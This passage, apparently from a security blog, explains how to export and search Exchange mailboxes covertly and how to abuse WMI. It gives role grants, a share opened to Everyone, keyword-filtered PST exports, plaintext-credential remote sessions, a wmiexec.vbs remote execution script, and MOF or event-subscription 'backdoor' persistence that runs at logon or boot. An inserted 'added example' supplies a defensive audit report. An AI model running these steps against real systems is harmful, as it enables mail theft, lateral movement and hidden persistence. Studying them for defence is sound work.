<h4 id="查看角色(默认只有组织管理成员才有导入-导出权限)"><a href="#查看角色(默认只有组织管理成员才有导入-导出权限)" class="headerlink" title="View roles (by default only Organization Management members have import/export permission)"></a>View roles (by default only Organization Management members have import/export permission)</h4><p>The Get-ManagementRole cmdlet lists the management roles created in the organization.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-ManagementRole</div><div class="line"></div><div class="line">Name RoleType</div><div class="line">---- --------</div><div class="line">Mailbox Import Export MailboxImportExport</div></pre></td></tr></table></figure></p>
<p>The Get-ManagementRoleAssignment cmdlet retrieves management role assignments.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-ManagementRoleAssignment -role "Mailbox Import Export" | Format-List RoleAssigneeName</div><div class="line"></div><div class="line">RoleAssigneeName : Organization Management</div><div class="line"></div><div class="line">RoleAssigneeName : Administrator</div></pre></td></tr></table></figure></p>
<h4 id="为用户Administrator添加邮箱导入导出角色"><a href="#为用户Administrator添加邮箱导入导出角色" class="headerlink" title="Add the Mailbox Import Export role to user Administrator"></a>Add the Mailbox Import Export role to user Administrator</h4><p>The New-ManagementRoleAssignment cmdlet assigns a management role to a management role group, a management role assignment policy, a user or a universal security group (USG).</p>
<blockquote>
<p>Restart the EMS after adding the role</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>New-ManagementRoleAssignment -Name "Import Export_Domain Admins" `</div><div class="line">>>-User "Administrator" -Role "Mailbox Import Export"</div><div class="line">>></div><div class="line"></div><div class="line">DataObject : Import Export_Domain Admins</div><div class="line">User : ruos.org/Users/Administrator</div><div class="line">AssignmentMethod : Direct</div><div class="line">Identity : Import Export_Domain Admins</div><div class="line">EffectiveUserName : Administrator</div></pre></td></tr></table></figure>
<p>Remove the management role assignment</p>
<p><code>Remove-ManagementRoleAssignment "Import Export_Domain Admins" -Confirm:$false</code></p>
<h4 id="New-MailboxExportRequest-cmdlet-将主邮箱或存档的内容导出到-pst-文件。"><a href="#New-MailboxExportRequest-cmdlet-将主邮箱或存档的内容导出到-pst-文件。" class="headerlink" title="The New-MailboxExportRequest cmdlet exports the contents of a primary mailbox or archive to a .pst file."></a>The New-MailboxExportRequest cmdlet exports the contents of a primary mailbox or archive to a .pst file.</h4><p>Create a shared folder with read/write permission using net share</p>
<p><code>net share sharename$=c:\share /GRANT:Everyone,FULL</code></p>
<p>Export all mail in user1's Inbox to a .pst </p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">New-MailboxExportRequest -Mailbox user1 -IncludeFolders <span class="string">"#Inbox#"</span> -FilePath \\<span class="number">10.2</span>.<span class="number">2.163</span>\maildata\user1.pst</div></pre></td></tr></table></figure>
<blockquote>
<p>Inbox, SentItems (sent mail), DeletedItems (deleted mail), Drafts</p>
</blockquote>
<p>Export the messages user Tony received before January 1, 2012 whose body contains "company" and "profit". </p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">New-MailboxExportRequest -Mailbox Tony `</div><div class="line">-ContentFilter {(body <span class="nomarkup">-like</span> <span class="string">"*company*"</span>) `</div><div class="line">-and (body <span class="nomarkup">-like</span> <span class="string">"*profit*"</span>) `</div><div class="line">-and (Received <span class="nomarkup">-lt</span> <span class="string">"01/01/2012"</span>)} `</div><div class="line">-FilePath <span class="string">"\\SERVER01\PSTFileShare\Tony_CompanyProfits.pst"</span></div></pre></td></tr></table></figure>
<p>Afterwards you can load it into Outlook to view it.</p>
<h4 id="查看导出请求状态"><a href="#查看导出请求状态" class="headerlink" title="View export request status"></a>View export request status</h4><p>The Get-MailboxExportRequest cmdlet shows the detailed status of export requests started with the New-MailboxExportRequest cmdlet.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-MailboxExportRequest</div><div class="line"></div><div class="line">Name Mailbox Status</div><div class="line">---- ------- ------</div><div class="line">MailboxExport ruos.org/Users/a Completed</div></pre></td></tr></table></figure></p>
<h4 id="删除全部或部分完成的导出请求"><a href="#删除全部或部分完成的导出请求" class="headerlink" title="Remove fully or partially completed export requests"></a>Remove fully or partially completed export requests</h4><p><code>[PS] C:\Windows\system32>Remove-MailboxExportRequest -Identity "a\MailboxExport"</code></p>
<p>Remove all export requests whose status is Completed</p>
<p><code>Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest -Confirm:$false</code></p>
<p>Or export through the ECP; the drawbacks are that you cannot filter by time, and the administrator receives a notification when the export completes.</p>
<p><img src="http://i.imgur.com/L24RI8O.jpg" alt=""></p>
<p>The above covers exporting user mail through the EMS, but nobody can guarantee you will not run straight into the administrator. Fortunately, Exchange Server supports remote PowerShell.</p>
<h2 id="Exchange-PowerShell"><a href="#Exchange-PowerShell" class="headerlink" title="Exchange PowerShell"></a>Exchange PowerShell</h2><p>Remote PowerShell provides a way to manage Exchange Online from the command line, which benefits everyone.</p>
<h4 id="创建用户凭证"><a href="#创建用户凭证" class="headerlink" title="Create user credentials"></a>Create user credentials</h4><p><code>$Credential = Get-Credential</code></p>
<p>But that pops up a credential prompt; use PSCredential to create a non-interactive logon credential.</p>
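<p>Added example, not code from the original post or Microsoft's documentation: an EMS report that shows the administrator's view of the export procedure above, that is, who holds the Mailbox Import Export role, where every export request wrote its PST, and which account ran the role-assignment and export cmdlets according to the admin audit log (enabled by default on Exchange 2013). The approved share prefix and the lookback window are assumptions.</p>

```powershell
# Added example (not from the original post). Run inside the EMS as an account
# that can read role assignments, export requests and the admin audit log.
# Assumptions: an approved PST share of \\FILESRV01\PSTArchive\ and a 30-day window.

function Get-MailboxExportAudit {
    param(
        [int]$DaysBack = 30,
        [string[]]$ApprovedSharePrefix = @('\\FILESRV01\PSTArchive\')   # assumed approved location
    )
    $since = (Get-Date).AddDays(-$DaysBack)

    # 1. Everyone who currently holds the role, directly or through a role
    #    group such as Organization Management
    $holders = Get-ManagementRoleAssignment -Role 'Mailbox Import Export' |
        Select-Object Name, RoleAssigneeName, RoleAssigneeType, AssignmentMethod

    # 2. Every export request still on record and the PST path it wrote to;
    #    anything outside the approved share is flagged
    $requests = Get-MailboxExportRequest | Get-MailboxExportRequestStatistics |
        ForEach-Object {
            $path = [string]$_.FilePath
            $approved = $false
            foreach ($prefix in $ApprovedSharePrefix) {
                if ($path.StartsWith($prefix, [System.StringComparison]::OrdinalIgnoreCase)) {
                    $approved = $true
                }
            }
            [pscustomobject]@{
                Request  = $_.Name
                Status   = $_.Status
                FilePath = $path
                Approved = $approved
            }
        }

    # 3. Who ran the cmdlets that grant the role, start an export or remove the
    #    request afterwards; a request deleted with Remove-MailboxExportRequest
    #    no longer appears in step 2 but still leaves an entry here
    $log = Search-AdminAuditLog `
        -Cmdlets New-ManagementRoleAssignment, New-MailboxExportRequest, Remove-MailboxExportRequest `
        -StartDate $since -EndDate (Get-Date) |
        ForEach-Object {
            [pscustomobject]@{
                RunDate    = $_.RunDate
                Caller     = $_.Caller
                Cmdlet     = $_.CmdletName
                Parameters = (($_.CmdletParameters | ForEach-Object { "-$($_.Name) $($_.Value)" }) -join ' ')
                Succeeded  = $_.Succeeded
            }
        }

    [pscustomobject]@{
        RoleHolders       = @($holders)
        ExportRequests    = @($requests)
        UnapprovedExports = @($requests | Where-Object { -not $_.Approved })
        AuditLogEntries   = @($log)
    }
}
```

The ECP export path mentioned below lands in the same audit log, so the report covers both routes.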
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$pass</span> = <span class="built_in">ConvertTo-SecureString</span> <span class="string">"PlainTextPassword"</span> -AsPlainText -Force</div><div class="line"><span class="variable">$Credential</span> = <span class="built_in">New-Object</span> System.Management.Automation.PSCredential (<span class="string">"Domain01\User01"</span>, <span class="variable">$pass</span>)</div></pre></td></tr></table></figure>
<h4 id="创建登陆会话"><a href="#创建登陆会话" class="headerlink" title="Create a logon session"></a>Create a logon session</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$Session</span> = <span class="built_in">New-PSSession</span> -ConfigurationName Microsoft.Exchange `</div><div class="line">-ConnectionUri http://<FQDN of Exchange <span class="number">2016</span> Mailbox server>/PowerShell/ `</div><div class="line">-Authentication Kerberos -Credential <span class="variable">$Credential</span></div></pre></td></tr></table></figure>
<h4 id="导入会话"><a href="#导入会话" class="headerlink" title="Import the session"></a>Import the session</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Import-PSSession</span> <span class="variable">$Session</span></div></pre></td></tr></table></figure>
<h4 id="移除会话"><a href="#移除会话" class="headerlink" title="Remove the session"></a>Remove the session</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Remove-PSSession</span> <span class="variable">$Session</span></div></pre></td></tr></table></figure>
<h2 id="Scripting-with-the-Exchange-Management-Shell"><a href="#Scripting-with-the-Exchange-Management-Shell" class="headerlink" title="Scripting with the Exchange Management Shell"></a>Scripting with the Exchange Management Shell</h2><p>Run scripts through the shell.<br>Applies to: Exchange Server 2013</p>
<p>The default Exchange root directory is &lt;root drive&gt;:\Program Files\Microsoft\Exchange Server\V15\bin</p>
<h4 id="执行自定义脚本"><a href="#执行自定义脚本" class="headerlink" title="Run a custom script"></a>Run a custom script</h4><p>Remote script execution must be enabled</p>
<p><code>Set-ExecutionPolicy RemoteSigned</code></p>
<p>Script</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># filename:test.ps1</span></div><div class="line"><span class="comment"># export to pst</span></div><div class="line"><span class="keyword">foreach</span>(<span class="variable">$user</span> <span class="keyword">in</span> <span class="string">"admin"</span>,<span class="string">"user1"</span>,<span class="string">"user2"</span>){</div><div class="line"> New-MailboxExportRequest -Mailbox <span class="variable">$user</span> -ContentFilter { Received <span class="nomarkup">-gt</span> <span class="string">"11/29/2016"</span> } -FilePath <span class="string">"\\192.168.6.2\sharename<span class="variable">$\$</span>user.pst"</span></div><div class="line"> <span class="built_in">Start-Sleep</span> -Seconds <span class="number">3</span></div><div class="line">}</div></pre></td></tr></table></figure>
<p>Launch the script from cmd</p>
<blockquote>
<p>On 64-bit systems file system redirection applies; the PowerShell path is C:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe</p>
</blockquote>
<p><code>PowerShell.exe -command ". 'C:\Program Files\Microsoft\Exchange Server\V15\bin\RemoteExchange.ps1'; Connect-ExchangeServer -auto; C:\test.ps1"</code></p>
<p>or </p>
<p>View role permissions</p>
<p><code>PowerShell.exe -command ". 'C:\Program Files\Microsoft\Exchange Server\V15\bin\RemoteExchange.ps1'; Connect-ExchangeServer -auto; Get-ManagementRoleAssignment -role \"Mailbox Import Export\""</code></p>
<h2 id="邮件搜索-Search-Mailbox"><a href="#邮件搜索-Search-Mailbox" class="headerlink" title="Mail search: Search-Mailbox"></a>Mail search: Search-Mailbox</h2><p>Step 1: Add the user to the Organization Manageme group and assign the role</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">net group "Organization Manageme" admin /add /domain</div><div class="line">[PS] C:\>New-ManagementRoleAssignment -Role "Mailbox Import Export" -User admin</div><div class="line"># add to the Discovery Management group</div><div class="line">[PS] C:\>Add-RoleGroupMember -Identity "Discovery Management" -Member admin</div></pre></td></tr></table></figure>
<p>Step 2: Create a discovery search mailbox<br><code>New-Mailbox -Name SearchResults -Discovery</code></p>
<p>Make the discovery mailbox visible in address lists<br><code>Set-Mailbox -Id SearchResults -HiddenFromAddressListsEnabled $false</code></p>
<p>View discovery search mailboxes<br><code>Get-Mailbox -Resultsize unlimited -Filter {RecipientTypeDetails -eq "DiscoveryMailbox"}</code></p>
<p>Step 3: Grant user admin full access to the search mailbox<br><code>Add-MailboxPermission SearchResults -User admin -AccessRights FullAccess -InheritanceType all</code></p>
<p>Step 4: Search mail</p>
<p>Search for mail containing the keywords key1 or key2, received after May 4, 2018, and not from the sender hr.</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># preview the results</span></div><div class="line">[PS] C:\>Search-Mailbox -Identity <span class="string">"test"</span> -SearchQuery <span class="string">'(key1 OR key2) AND Received>05/04/2018 NOT From:hr@ruos.org'</span> -EstimateResultOnly</div><div class="line"></div><div class="line">[PS] C:\>Get-Mailbox -ResultSize Unlimited |</div><div class="line">Search-Mailbox -SearchQuery <span class="string">'(key1 OR key2) AND Received:05/01/2018..05/08/2018'</span> `</div><div class="line">-DoNotIncludeArchive `</div><div class="line">-TargetMailbox <span class="string">"SearchResults"</span> `</div><div class="line">-TargetFolder <span class="string">"Results"</span> `</div><div class="line">-LogLevel Suppress</div></pre></td></tr></table></figure>
<p>Open the search mailbox from the test mailbox</p>
<p><img src="https://i.imgur.com/fv4mOuF.png" alt=""></p>
<h2 id="结束语"><a href="#结束语" class="headerlink" title="Closing remarks"></a>Closing remarks</h2><p>The tight coupling of Exchange and AD means many cmdlets in the reference can achieve the same goal; for example, the source IP address of a user's logon can also be found in Exchange's IIS logs. Unfortunately, sometimes a user is using the mailbox while their workstation is not joined to the domain, in which case other information is needed for further confirmation.</p>
<p><img src="http://i.imgur.com/f0rIlU4.png" alt=""></p>
<p>References</p>
<p><a href="https://technet.microsoft.com/zh-cn/library/mt587043(v=exchg.150).aspx" target="_blank" rel="external">https://technet.microsoft.com/zh-cn/library/mt587043(v=exchg.150).aspx</a><br><a href="https://technet.microsoft.com/zh-cn/library/bb124558(v=exchg.150).aspx" target="_blank" rel="external">https://technet.microsoft.com/zh-cn/library/bb124558(v=exchg.150).aspx</a><br><a href="https://msdn.microsoft.com/en-us/library/hh770397(v=exchsrvcs.149).aspx" target="_blank" rel="external">https://msdn.microsoft.com/en-us/library/hh770397(v=exchsrvcs.149).aspx</a><br>Microsoft Exchange Server 2013 PowerShell Cookbook</p>
<p><a href="http://blog.51cto.com/msftuc/1660885" target="_blank" rel="external">http://blog.51cto.com/msftuc/1660885</a></p>
]]></content>
</entry>
<entry>
<title><![CDATA[WMI]]></title>
<url>/2017/02/08/WMI/</url>
<content type="html"><![CDATA[<h3 id="WMI-管理规范"><a href="#WMI-管理规范" class="headerlink" title="WMI Management Specification"></a>WMI Management Specification</h3><p>Terminology</p>
<ul>
<li>CIM - Common Information Model – the premier concept of WBEM; in this model WMI stores the managed objects' data (namespaces, classes, methods, properties, etc.). </li>
<li>CIM Repository – the storage that holds the managed objects' data. The structure of the CIM repository is built upon the DMTF standards. </li>
<li>CIMOM - Common Information Model Object Manager. The CIM repository is managed by the CIMOM, which acts as an agent for object requests. The CIMOM tracks the available classes and determines which provider is responsible for supplying instances of these classes. </li>
<li>DMTF - Distributed Management Task Force – the DMTF consortium was founded in May 1992. The initiative was conceived and created by eight companies, including BMC Software Inc., Cisco Systems Inc., Compaq Computer Corp., Intel Corp. and Microsoft Corp. The aim of the consortium is to define industry standards for management.</li>
<li>MIB – Management Information Base, which describes a set of managed objects. Each managed object in a MIB has a unique identifier.</li>
<li>MOF - Managed Object Format. This text file contains the class definition of one or more managed objects. You can export and import these definitions from the CIM repository using WMI CIM Studio.</li>
<li>Schema - a group of classes that describe a particular management environment.</li>
<li>SNMP - Simple Network Management Protocol. SNMP is an Internet standard defined by the IETF and is part of the TCP/IP suite of protocols. SNMP is the protocol by which management information travels between management stations and agents. Management information refers to a collection of managed objects that reside in a virtual information store called a Management Information Base (MIB).</li>
<li>WBEM - Web-Based Enterprise Management – WBEM stands for several DMTF industry standards, including the Common Information Model. WBEM provides a standardized way to access information from various hardware and software management systems in an enterprise environment. </li>
</ul>
<p>Protocols</p>
<p>DCOM TCP Port 135<br>WinRM TCP Ports 5985 (HTTP) and 5986 (HTTPS).<br>Service: Winmgmt </p>
<a id="more"></a>
<h3 id="测试工具"><a href="#测试工具" class="headerlink" title="Test tools"></a>Test tools</h3><ul>
<li>wmic.exe</li>
<li>wbemtest.exe</li>
<li>winrm.exe</li>
<li>CIM Studio</li>
<li>Powershell</li>
</ul>
<p>WMIC</p>
<p>List processes<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">wmic process list brief</div></pre></td></tr></table></figure></p>
<p>Create a process<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">wmic process call create "notepad.exe"</div><div class="line">wmic /node:"hostname" /user:"domain\administrator" /password:"123456" process get name,processid</div></pre></td></tr></table></figure></p>
<p>Terminate a program<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">wmic process where name="qq.exe" call terminate</div></pre></td></tr></table></figure></p>
<p>Start a service<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">wmic SERVICE where name="tlntsvr" call startservice</div></pre></td></tr></table></figure></p>
<p>Scheduled jobs<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">wmic job</div></pre></td></tr></table></figure></p>
<p>Powershell<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Get-WmiObject</span> -Namespace root\SecurityCenter2 -Class AntiVirusProduct</div></pre></td></tr></table></figure></p>
<p>-Credential takes a PSCredential prepared in advance (for example with Get-Credential); given only a user name, as here, PowerShell prompts for the password<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Invoke-WmiMethod</span> -Class Win32_Process -Name Create -ArgumentList <span class="string">'notepad.exe'</span> -ComputerName <span class="number">192.168</span>.<span class="number">6.2</span> -Credential domain\administrator</div></pre></td></tr></table></figure></p>
<p>WQL: a data query (hosts with fewer than two logical processors), an intrinsic event query that polls every 15 s for new interactive logon sessions (LogonType 2), and an extrinsic event query for volume arrival (EventType 2)<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> Win32_ComputerSystem <span class="keyword">WHERE</span> NumberOfLogicalProcessors < <span class="number">2</span> </div><div class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> __InstanceCreationEvent <span class="keyword">WITHIN</span> <span class="number">15</span> <span class="keyword">WHERE</span> TargetInstance ISA <span class="string">'Win32_LogonSession'</span> <span class="keyword">AND</span> TargetInstance.LogonType = <span class="number">2</span> </div><div class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> Win32_VolumeChangeEvent <span class="keyword">WHERE</span> EventType = <span class="number">2</span></div></pre></td></tr></table></figure></p>
<h3 id="WSH"><a href="#WSH" class="headerlink" title="WSH"></a>WSH</h3><p>Remote command execution</p>
<blockquote>
<p>A low-privileged user sometimes cannot start the wmic command-line utility, but VBScript can still reach the WMI interface through the WbemScripting COM object.</p>
</blockquote>
<figure class="highlight vbs"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div></pre></td><td class="code"><pre><div class="line"><span class="comment">'VBS</span></div><div class="line"><span class="comment">' remote command exec</span></div><div class="line"><span class="comment">' cscript wmiexec.vbs 192.168.6.2 domain\administrator 123456 "cmd.exe /c net user > c:\11.txt"</span></div><div class="line"><span class="keyword">On</span> <span class="keyword">Error</span> <span class="keyword">GoTo</span> <span class="number">0</span></div><div class="line"><span class="keyword">Dim</span> strComputer</div><div class="line"><span class="keyword">Dim</span> strUser</div><div class="line"><span class="keyword">Dim</span> strPassword</div><div class="line"><span class="keyword">Dim</span> strCommand</div><div class="line"><span class="keyword">Set</span> objArgs = WScript.Arguments</div><div class="line">strComputer = objArgs(<span class="number">0</span>)</div><div class="line">strUser = objArgs(<span class="number">1</span>)</div><div class="line">strPassword = objArgs(<span class="number">2</span>)</div><div class="line">strCommand = objArgs(<span class="number">3</span>)</div><div class="line"><span class="keyword">Set</span> objWMIService = <span 
class="built_in">CreateObject</span>(<span class="string">"WbemScripting.SWbemLocator"</span>).ConnectServer(strComputer,<span class="string">"root/cimv2"</span>,strUser,strPassword)</div><div class="line"><span class="comment">' Create process</span></div><div class="line"><span class="keyword">Set</span> process = objWMIService.<span class="keyword">Get</span>(<span class="string">"Win32_Process"</span>)</div><div class="line">intReturn = process.Create(strCommand)</div><div class="line"><span class="keyword">If</span> intReturn <><span class="number">0</span> <span class="keyword">then</span></div><div class="line"> WScript.Echo <span class="string">"Return value: "</span> & intReturn</div><div class="line"> WScript.Echo <span class="string">"Access denied (2)"</span> &vbLf & _</div><div class="line"> <span class="string">"Insufficient privilege (3)"</span> &vbLf & _</div><div class="line"> <span class="string">"Unknown failure (8)"</span> &vbLf & _</div><div class="line"> <span class="string">"Path not found (9)"</span> &vbLf & _</div><div class="line"> <span class="string">"Invalid parameter (21)"</span> &vbLf & _</div><div class="line"> <span class="string">"Other (22-4294967295)"</span></div><div class="line"><span class="keyword">Else</span></div><div class="line"> Wscript.Echo <span class="string">"Process created."</span></div><div class="line"><span class="keyword">End</span> <span class="keyword">If</span></div></pre></td></tr></table></figure>
<h3 id="MOF-后门"><a href="#MOF-后门" class="headerlink" title="MOF 后门"></a>MOF backdoor</h3><blockquote>
<p>Managed Object Format (MOF) is the textual format in which WMI classes and class instances are defined; mofcomp compiles it into the CIM repository.</p>
</blockquote>
<p>Dynamically creating a WMI class (a static class stored in the repository; its property can hold arbitrary data)</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$StaticClass</span> = <span class="built_in">New-Object</span> System.Management.ManagementClass(<span class="string">'root\cimv2'</span>,<span class="literal">$null</span>,<span class="literal">$null</span>)</div><div class="line"><span class="variable">$StaticClass</span>.Name = <span class="string">'Win32_EvilClass'</span></div><div class="line"><span class="variable">$StaticClass</span>.Put()</div><div class="line"><span class="variable">$StaticClass</span>.Properties.Add(<span class="string">'EvilProperty'</span>,<span class="string">"This is not the malware you're looking for"</span>)</div><div class="line"><span class="variable">$StaticClass</span>.Put()</div></pre></td></tr></table></figure>
<p>Creating a permanent event subscription (three objects in the root\subscription namespace)</p>
<ol>
<li>Event filter: a WQL query that selects the events of interest (__EventFilter) </li>
<li><p>Event consumer: the action to perform when the filter fires; the standard consumer classes derive from __EventConsumer </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">__EventConsumer (base class)</div><div class="line">LogFileEventConsumer - writes the event data to a text log file</div><div class="line">ActiveScriptEventConsumer - runs embedded VBScript or JScript</div><div class="line">NTEventLogEventConsumer - writes an entry containing the event data to the Windows event log</div><div class="line">SMTPEventConsumer - sends an e-mail containing the event data</div><div class="line">CommandLineEventConsumer - runs a command line</div></pre></td></tr></table></figure>
</li>
<li><p>Binding: ties the filter to the consumer<br> __FilterToConsumerBinding</p>
</li>
</ol>
<p>Event types </p>
<p>Intrinsic events<br>Intrinsic events report the creation, modification or deletion of any WMI class, instance or namespace; their class names start with two underscores (__InstanceCreationEvent, __InstanceModificationEvent, __InstanceDeletionEvent). They are produced by polling, so events can be missed, and the WQL query must state the polling interval in a WITHIN clause.<br>__InstanceCreationEvent </p>
<p>Extrinsic events<br>Extrinsic events are fewer; a provider raises them the moment the event happens, so no WITHIN clause is needed. Examples used on this page: Win32_ProcessStartTrace and Win32_VolumeChangeEvent in ROOT\CIMV2. </p>
<blockquote>
<p>Using the extrinsic Win32_ProcessStartTrace event with ProcessName = LogonUI.exe as the trigger, a chosen script or program runs whenever the logon screen appears, i.e. at user logon.</p>
</blockquote>
<p>test.mof</p>
<p><a href="https://www.codeproject.com/articles/27914/wmi-mof-basics" target="_blank" rel="external">https://www.codeproject.com/articles/27914/wmi-mof-basics</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line">#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")</div><div class="line"></div><div class="line">instance of CommandLineEventConsumer as $Consumer</div><div class="line">{</div><div class="line"> Name = "WMI_Mofbackdoor_Test_CL";</div><div class="line"> RunInteractively=false;</div><div class="line"> CommandLineTemplate="calc.exe";</div><div class="line">};</div><div class="line"></div><div class="line">instance of __EventFilter as $EventFilter</div><div class="line">{</div><div class="line"> Name = "WMI_Mofbackdoor_Test_EF";</div><div class="line"> EventNamespace = "Root\\Cimv2";</div><div class="line"> Query ="SELECT * FROM __InstanceCreationEvent Within 5 Where TargetInstance Isa \"Win32_Process\" And Targetinstance.Name = \"notepad.exe\" ";</div><div class="line"> QueryLanguage = "WQL";</div><div class="line">};</div><div class="line"></div><div class="line">instance of __FilterToConsumerBinding {</div><div class="line"> Filter = $EventFilter;</div><div class="line"> Consumer = $Consumer;</div><div class="line">};</div></pre></td></tr></table></figure>
<p>Compile<br>mofcomp.exe -autorecover test.mof (-autorecover also registers the file so it is recompiled whenever the repository is rebuilt) </p>
<p>mofcomp -N:\\[machinename]\root\subscription test.mof (the -N: switch overrides the #PRAGMA NAMESPACE in the file; drop the machine name for the local repository)</p>
<p>Alternatively, drop the file into %SystemRoot%\System32\Wbem\MOF, where it is compiled automatically. This auto-compile directory exists only on Windows XP/Server 2003 and was removed in later versions.</p>
<p>PowerShell</p>
<p>• Get-WmiObject<br>• Get-CimAssociatedInstance<br>• Get-CimClass - Powershell 3.0 CmdLet<br>• Get-CimInstance<br>• Get-CimSession<br>• Set-WmiInstance<br>• Set-CimInstance<br>• Invoke-WmiMethod<br>• Invoke-CimMethod<br>• New-CimInstance<br>• New-CimSession<br>• New-CimSessionOption<br>• Register-CimIndicationEvent<br>• Register-WmiEvent<br>• Remove-CimInstance<br>• Remove-WmiObject<br>• Remove-CimSession </p>
<p>Creating a boot-time trigger (the filter fires when SystemUpTime is between 200 and 320 seconds, i.e. a few minutes after every boot)</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$filterName</span>=<span class="string">'BotFilter82'</span></div><div class="line"><span class="variable">$consumerName</span>=<span class="string">'BotConsumer23'</span></div><div class="line"><span class="variable">$exePath</span>=<span class="string">'C:\MyProg.exe'</span></div><div class="line"><span class="comment"># create the __EventFilter (fires once SystemUpTime is between 200 and 320 s)</span></div><div class="line"><span class="variable">$Query</span>=<span class="string">"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"</span></div><div class="line"><span class="variable">$WMIEventFilter</span>=<span class="built_in">Set-WmiInstance</span> -Class __EventFilter -NameSpace <span class="string">"root\subscription"</span> -Arguments @{</div><div class="line">Name=<span class="variable">$filterName</span>;</div><div class="line">EventNameSpace=<span class="string">"root\cimv2"</span>;</div><div class="line">QueryLanguage=<span class="string">"WQL"</span>;</div><div 